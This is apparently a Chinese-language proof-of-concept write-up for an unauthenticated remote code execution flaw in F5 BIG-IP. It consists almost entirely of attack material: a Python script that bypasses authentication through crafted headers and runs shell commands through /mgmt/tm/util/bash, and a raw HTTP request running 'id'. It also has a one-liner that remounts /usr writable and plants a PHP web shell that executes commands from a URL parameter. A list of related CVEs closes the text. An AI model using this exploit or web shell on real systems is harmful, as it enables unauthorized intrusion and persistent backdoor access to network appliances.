本文字数:1422
https://www.f5.com/trials
https://downloads.f5.com/esd/product.jsp?sw=BIG-IP&pro=big-ip_v14.x&ver=14.1.2
import requests
import json
import ssl
import urllib3
urllib3.disable_warnings()
ssl._create_default_https_context = ssl._create_unverified_context
requests.packages.urllib3.disable_warnings()
def attack(target_url):
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
'Content-Type': 'application/json',
'Connection': 'Keep-Alive, X-F5-Auth-Token, X-Forwarded-Host',
'X-F5-Auth-Token': 'a',
'Authorization': 'Basic YWRtaW46'
}
cmd = 'whoami'
attack_url = target_url + '/mgmt/tm/util/bash'
data = {'command': "run", 'utilCmdArgs': "-c '{0}'".format(cmd)}
try:
response = requests.post(url=attack_url, json=data, headers=headers, verify=False, timeout=5)
if response.status_code == 200 and 'commandResult' in response.text:
default = json.loads(response.text)
display = default['commandResult']
print("[+] 目标 {} 存在漏洞".format(target_url))
print('[+] 响应为:{0}'.format(display))
else:
print("[-] 目标 {} 不存在漏洞".format(target_url))
except Exception as e:
print('url 访问异常 {0}'.format(target_url))
if __name__ == '__main__':
target_url = "https://10.0.24.55/"
print(target_url)
attack(target_url)
POST /mgmt/tm/util/bash HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Authorization: Basic YWRtaW46
Connection: keep-alive, X-F5-Auth-Token
Content-Type: application/json
X-F5-Auth-Token: a
Accept-Encoding: gzip
{
"command": "run",
"utilCmdArgs": "-c id"
}
mount -o remount -rw /usr ;echo 'It works!<?php $a=$_GET["cmd"];system($a);?>' > /usr/local/www/xui/common/scripts/jquery.php;mount -o remount -r /usr
历史漏洞:
CVE-2021-22986:BIG-IP/BIG-IQ未授权RCE
CVE-2020-5902:F5 BIG-IP 远程代码执行漏洞复现